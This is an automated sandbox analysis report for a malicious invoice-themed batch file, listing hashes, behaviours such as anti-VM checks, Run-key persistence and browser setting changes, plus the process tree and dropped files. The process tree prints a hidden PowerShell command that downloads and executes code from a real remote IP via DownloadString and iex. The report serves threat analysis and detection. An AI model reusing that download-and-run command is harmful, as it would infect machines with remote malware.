Analysis
-
max time kernel
961s -
max time network
963s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
22-06-2022 20:19
Static task
static1
Behavioral task
behavioral1
Sample
F-actura0622.bat
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
F-actura0622.bat
Resource
win10v2004-20220414-en
General
-
Target
F-actura0622.bat
-
Size
1KB
-
MD5
6cef8304265178796921535f0a2e9c03
-
SHA1
07275c43ac049126b967325baf984e3def7af1ed
-
SHA256
db9c0fd3a144ea0a24d8d65841ae94f7336ed420428dd455ed4b27ac081949c5
-
SHA512
1a2fa8832ed844fad8b704754f929df1ed71931f043571f3c0d9e6025ff821b0169c028f15062df10bb350668522e9f17af14a1dd81283c5222b01af974157f3
Malware Config
Extracted
http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
naK.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ naK.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 6 2316 powershell.exe 13 2316 powershell.exe 14 2316 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
naK.exepid process 4676 naK.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
naK.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion naK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion naK.exe -
Loads dropped DLL 2 IoCs
Processes:
naK.exepid process 4676 naK.exe 4676 naK.exe -
Processes:
resource yara_rule C:\ProgramData\boACkwMt\gcpfqzsczq.dop themida C:\ProgramData\boACkwMt\gcpfqzsczq.dop themida C:\ProgramData\boACkwMt\gcpfqzsczq.dop themida behavioral2/memory/4676-149-0x0000000004B10000-0x0000000005C07000-memory.dmp themida behavioral2/memory/4676-150-0x0000000004B10000-0x0000000005C07000-memory.dmp themida behavioral2/memory/4676-151-0x0000000004B10000-0x0000000005C07000-memory.dmp themida behavioral2/memory/4676-152-0x0000000004B10000-0x0000000005C07000-memory.dmp themida behavioral2/memory/4676-153-0x0000000004B10000-0x0000000005C07000-memory.dmp themida behavioral2/memory/4676-154-0x0000000004B10000-0x0000000005C07000-memory.dmp themida behavioral2/memory/4676-155-0x0000000004B10000-0x0000000005C07000-memory.dmp themida behavioral2/memory/4676-156-0x0000000004B10000-0x0000000005C07000-memory.dmp themida -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OViDQHR = "C:\\ProgramData\\naK.lnk" powershell.exe -
Processes:
naK.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA naK.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 12 ifconfig.me 20 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
naK.exepid process 4676 naK.exe -
Processes:
naK.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FormSuggest PW Ask = "No" naK.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "No" naK.exe Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FormSuggest Passwords = "No" naK.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
naK.exepid process 4676 naK.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2316 powershell.exe 2316 powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
powershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 2316 powershell.exe Token: SeIncreaseQuotaPrivilege 4520 WMIC.exe Token: SeSecurityPrivilege 4520 WMIC.exe Token: SeTakeOwnershipPrivilege 4520 WMIC.exe Token: SeLoadDriverPrivilege 4520 WMIC.exe Token: SeSystemProfilePrivilege 4520 WMIC.exe Token: SeSystemtimePrivilege 4520 WMIC.exe Token: SeProfSingleProcessPrivilege 4520 WMIC.exe Token: SeIncBasePriorityPrivilege 4520 WMIC.exe Token: SeCreatePagefilePrivilege 4520 WMIC.exe Token: SeBackupPrivilege 4520 WMIC.exe Token: SeRestorePrivilege 4520 WMIC.exe Token: SeShutdownPrivilege 4520 WMIC.exe Token: SeDebugPrivilege 4520 WMIC.exe Token: SeSystemEnvironmentPrivilege 4520 WMIC.exe Token: SeRemoteShutdownPrivilege 4520 WMIC.exe Token: SeUndockPrivilege 4520 WMIC.exe Token: SeManageVolumePrivilege 4520 WMIC.exe Token: 33 4520 WMIC.exe Token: 34 4520 WMIC.exe Token: 35 4520 WMIC.exe Token: 36 4520 WMIC.exe Token: SeIncreaseQuotaPrivilege 4520 WMIC.exe Token: SeSecurityPrivilege 4520 WMIC.exe Token: SeTakeOwnershipPrivilege 4520 WMIC.exe Token: SeLoadDriverPrivilege 4520 WMIC.exe Token: SeSystemProfilePrivilege 4520 WMIC.exe Token: SeSystemtimePrivilege 4520 WMIC.exe Token: SeProfSingleProcessPrivilege 4520 WMIC.exe Token: SeIncBasePriorityPrivilege 4520 WMIC.exe Token: SeCreatePagefilePrivilege 4520 WMIC.exe Token: SeBackupPrivilege 4520 WMIC.exe Token: SeRestorePrivilege 4520 WMIC.exe Token: SeShutdownPrivilege 4520 WMIC.exe Token: SeDebugPrivilege 4520 WMIC.exe Token: SeSystemEnvironmentPrivilege 4520 WMIC.exe Token: SeRemoteShutdownPrivilege 4520 WMIC.exe Token: SeUndockPrivilege 4520 WMIC.exe Token: SeManageVolumePrivilege 4520 WMIC.exe Token: 33 4520 WMIC.exe Token: 34 4520 WMIC.exe Token: 35 4520 WMIC.exe Token: 36 4520 WMIC.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
powershell.exenaK.exepid process 2316 powershell.exe 2316 powershell.exe 2316 powershell.exe 4676 naK.exe 4676 naK.exe 4676 naK.exe 4676 naK.exe 4676 naK.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
naK.exepid process 4676 naK.exe 4676 naK.exe 4676 naK.exe 4676 naK.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.execmd.execmd.exepowershell.exedescription pid process target process PID 948 wrote to memory of 2920 948 cmd.exe cmd.exe PID 948 wrote to memory of 2920 948 cmd.exe cmd.exe PID 2920 wrote to memory of 1904 2920 cmd.exe chcp.com PID 2920 wrote to memory of 1904 2920 cmd.exe chcp.com PID 948 wrote to memory of 4072 948 cmd.exe chcp.com PID 948 wrote to memory of 4072 948 cmd.exe chcp.com PID 948 wrote to memory of 712 948 cmd.exe cmd.exe PID 948 wrote to memory of 712 948 cmd.exe cmd.exe PID 712 wrote to memory of 2316 712 cmd.exe powershell.exe PID 712 wrote to memory of 2316 712 cmd.exe powershell.exe PID 2316 wrote to memory of 4520 2316 powershell.exe WMIC.exe PID 2316 wrote to memory of 4520 2316 powershell.exe WMIC.exe PID 2316 wrote to memory of 4676 2316 powershell.exe naK.exe PID 2316 wrote to memory of 4676 2316 powershell.exe naK.exe PID 2316 wrote to memory of 4676 2316 powershell.exe naK.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F-actura0622.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp3⤵
-
C:\Windows\system32\chcp.comchcp 7082⤵
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\F-actura0622.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -nop -noexit -windowstyle hidden "(new-object net.webclient).DownloadString('http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT') | iex"3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct GET displayName /Format:List4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\boACkwMt\naK.exe"C:\ProgramData\boACkwMt\naK.exe" "C:\ProgramData\boACkwMt\odJ"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\boACkwMt\gcpfqzsczq.dopFilesize
6.8MB
MD5cb0e540176159268be4986459091576a
SHA1c512c14e8a2afb15636e7b4c6f30284646b8d456
SHA256fbe44a3401b91f4fa23f2df40e6844931bfc1e8931fefcf301b786788b44a6f4
SHA512a04fc5b10b46bd2cec4ce3ec48b29ca87e3137a3f5e2d3575d18a6282c98a6c9e9e7c9316494fbeb1a4e30ce24842d41c074c3d4c3c122e0378f8259b25a4b1a
-
C:\ProgramData\boACkwMt\gcpfqzsczq.dopFilesize
6.8MB
MD5cb0e540176159268be4986459091576a
SHA1c512c14e8a2afb15636e7b4c6f30284646b8d456
SHA256fbe44a3401b91f4fa23f2df40e6844931bfc1e8931fefcf301b786788b44a6f4
SHA512a04fc5b10b46bd2cec4ce3ec48b29ca87e3137a3f5e2d3575d18a6282c98a6c9e9e7c9316494fbeb1a4e30ce24842d41c074c3d4c3c122e0378f8259b25a4b1a
-
C:\ProgramData\boACkwMt\gcpfqzsczq.dopFilesize
6.8MB
MD5cb0e540176159268be4986459091576a
SHA1c512c14e8a2afb15636e7b4c6f30284646b8d456
SHA256fbe44a3401b91f4fa23f2df40e6844931bfc1e8931fefcf301b786788b44a6f4
SHA512a04fc5b10b46bd2cec4ce3ec48b29ca87e3137a3f5e2d3575d18a6282c98a6c9e9e7c9316494fbeb1a4e30ce24842d41c074c3d4c3c122e0378f8259b25a4b1a
-
C:\ProgramData\boACkwMt\naK.exeFilesize
884KB
MD54685811c853ceaebc991c3a8406694bf
SHA19cd382eb91bfea5782dd09f589a31b47c2c2b53e
SHA2563242e0a736ef8ac90430a9f272ff30a81e2afc146fcb84a25c6e56e8192791e4
SHA512a504fbca674f15d8964ebc6fac11d9431d700ca22736c00d5bb1e51551b0d2b9e4b2b6824bdf1a778111a0ba8d2601eada2f726b9ec7a9cfa5a53fd43c235b46
-
C:\ProgramData\boACkwMt\naK.exeFilesize
884KB
MD54685811c853ceaebc991c3a8406694bf
SHA19cd382eb91bfea5782dd09f589a31b47c2c2b53e
SHA2563242e0a736ef8ac90430a9f272ff30a81e2afc146fcb84a25c6e56e8192791e4
SHA512a504fbca674f15d8964ebc6fac11d9431d700ca22736c00d5bb1e51551b0d2b9e4b2b6824bdf1a778111a0ba8d2601eada2f726b9ec7a9cfa5a53fd43c235b46
-
C:\ProgramData\boACkwMt\odJFilesize
178B
MD52c2d7336ea1206702663cfb74b74d0b9
SHA1e5f610f63b5762104e7dbc2635b8485f267b96d1
SHA2566589d846120ced6f77bda3b905ef0ff0c14947f31389481d1900a8958a19a49b
SHA5129ae77c606fa3f3275da91954073b1f6b2dbddb4593463f80fc2ad42e4a07d366d353aa4530612470a66a78623f008d4c2134c6ea20a6a796374dc5e27776d024
-
memory/712-133-0x0000000000000000-mapping.dmp
-
memory/1904-131-0x0000000000000000-mapping.dmp
-
memory/2316-137-0x00000236EF4A0000-0x00000236EF4E4000-memory.dmpFilesize
272KB
-
memory/2316-139-0x00000236F2E20000-0x00000236F35C6000-memory.dmpFilesize
7.6MB
-
memory/2316-142-0x00000236F11B0000-0x00000236F1226000-memory.dmpFilesize
472KB
-
memory/2316-143-0x00007FFD52380000-0x00007FFD52E41000-memory.dmpFilesize
10.8MB
-
memory/2316-136-0x00007FFD52380000-0x00007FFD52E41000-memory.dmpFilesize
10.8MB
-
memory/2316-135-0x00000236ECF00000-0x00000236ECF22000-memory.dmpFilesize
136KB
-
memory/2316-134-0x0000000000000000-mapping.dmp
-
memory/2920-130-0x0000000000000000-mapping.dmp
-
memory/4072-132-0x0000000000000000-mapping.dmp
-
memory/4520-138-0x0000000000000000-mapping.dmp
-
memory/4676-149-0x0000000004B10000-0x0000000005C07000-memory.dmpFilesize
17.0MB
-
memory/4676-148-0x0000000077D30000-0x0000000077ED3000-memory.dmpFilesize
1.6MB
-
memory/4676-150-0x0000000004B10000-0x0000000005C07000-memory.dmpFilesize
17.0MB
-
memory/4676-151-0x0000000004B10000-0x0000000005C07000-memory.dmpFilesize
17.0MB
-
memory/4676-152-0x0000000004B10000-0x0000000005C07000-memory.dmpFilesize
17.0MB
-
memory/4676-153-0x0000000004B10000-0x0000000005C07000-memory.dmpFilesize
17.0MB
-
memory/4676-154-0x0000000004B10000-0x0000000005C07000-memory.dmpFilesize
17.0MB
-
memory/4676-155-0x0000000004B10000-0x0000000005C07000-memory.dmpFilesize
17.0MB
-
memory/4676-156-0x0000000004B10000-0x0000000005C07000-memory.dmpFilesize
17.0MB
-
memory/4676-140-0x0000000000000000-mapping.dmp
-
memory/4676-158-0x0000000077D30000-0x0000000077ED3000-memory.dmpFilesize
1.6MB
-
memory/4676-159-0x0000000077D30000-0x0000000077ED3000-memory.dmpFilesize
1.6MB